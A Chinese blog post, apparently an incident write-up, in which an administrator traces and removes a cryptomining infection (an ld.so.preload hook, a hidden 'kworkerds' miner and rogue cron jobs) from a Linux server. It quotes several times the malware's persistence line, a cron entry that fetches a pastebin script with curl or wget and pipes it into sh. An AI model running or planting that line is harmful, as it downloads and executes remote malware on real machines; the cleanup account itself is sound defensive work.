• 云盾态势感知系统检测到您的服务器出现了紧急安全事件:挖矿木马

    问题描述:收到阿里云的报警通知

    在这里插入图片描述

    登录服务器查看进程:未发现有进程占用CPU过高的现象

    在这里插入图片描述

    查看/etc/ld.so.preload文件,里面连接到/usr/local/lib/libdns.so

    [root@SJ-pre-release ~]# cat /etc/ld.so.preload
/usr/local/lib/libdns.so

    查看/usr/local/lib/路径,看看是否有libdns.so文件

    查看定时任务,发现存在一个陌生的定时任务,

     [root@SJ-pre-release ~]# crontab -l
*/23 * * * *	(curl -fsSL https://pastebin.com/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh

    解决办法:

        ###清除/etc/ld.so.preload的内容
    [root@SJ-pre-release ~]# echo "" > /etc/ld.so.preload
   ### 删除/usr/local/lib/lib/libdns.so文件
    [root@SJ-pre-release ~]# rm -rf /usr/local/lib/lib/libdns.so
   ### 删除定时任务
    [root@SJ-pre-release ~]# cat /var/spool/cron/root
    */23 * * * *	(curl -fsSL https://pastebin.com/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh
    ##
    [root@SJ-pre-release ~]# rm -rf /var/spool/cron/root
    [root@SJ-pre-release ~]# cat /var/spool/cron/crontabs/root
    */31 * * * *	(curl -fsSL https://pastebin.com/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh
    ##
    [root@SJ-pre-release ~]# rm -rf /var/spool/cron/crontabs/root

    在这里插入图片描述

    再次查看进程,发现有一个kworkerds,进程号为14711的进程,CPU占有率高达397.5%

    [root@SJ-pre-release ~]# top
top - 09:12:50 up 229 days, 21:41,  9 users,  load average: 4.23, 4.12, 4.08
Tasks: 145 total,   1 running, 144 sleeping,   0 stopped,   0 zombie
%Cpu(s): 99.8 us,  0.2 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
KiB Mem:   8011936 total,  7647536 used,   364400 free,   303504 buffers
KiB Swap:        0 total,        0 used,        0 free.   301404 cached Mem

  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
14711 root      20   0  566768  35644    756 S 397.5  0.4   1719:53 kworkerds
11701 root      20   0 4730228 797664  12764 S   1.7 10.0 536:07.20 java
18094 root      20   0       0      0      0 S   0.3  0.0   0:00.05 kworker/3:2
18155 root      20   0  123696   1684   1156 R   0.3  0.0   0:00.08 top
22408 root      20   0 1281204 193204   5124 S   0.3  2.4  77:45.91 node

    在这里插入图片描述

    使用ps命令查看该进程的路径

    [root@SJ-pre-release ~]# ps -aux | grep 14711
root     14711  397  0.4 566768 35644 ?        Sl   02:00 1720:38 /tmp/kworkerds
root     18157  0.0  0.0 112644   984 pts/1    S+   09:13   0:00 grep --color=auto 14711
先删掉进程,再删除文件
[root@SJ-pre-release ~]# kill -9 14711
[root@SJ-pre-release ~]# ps -aux | grep 14711
root     18175  0.0  0.0 112644   984 pts/1    S+   09:13   0:00 grep --color=auto 14711
[root@SJ-pre-release ~]# rm -rf /tmp/kworkerds

    在这里插入图片描述
    问题解决
  • 相关阅读:
    大哥带我走渗透8--CSRF的应用
    大哥带我走渗透7----解析漏洞
    大哥带我走渗透6(下)---文件上传
    视频学习XSS
    大哥带我走渗透5--南方数据
    大哥带我走渗透4(中)----oracle报错注入
    大哥带我走渗透ii--时间盲注,布尔盲注
    SQL语言基础和数据库操作
    less-7
    less-6
  • 原文地址:https://www.cnblogs.com/sujc-blogs/p/9722480.html
Copyright © 2020-2023  润新知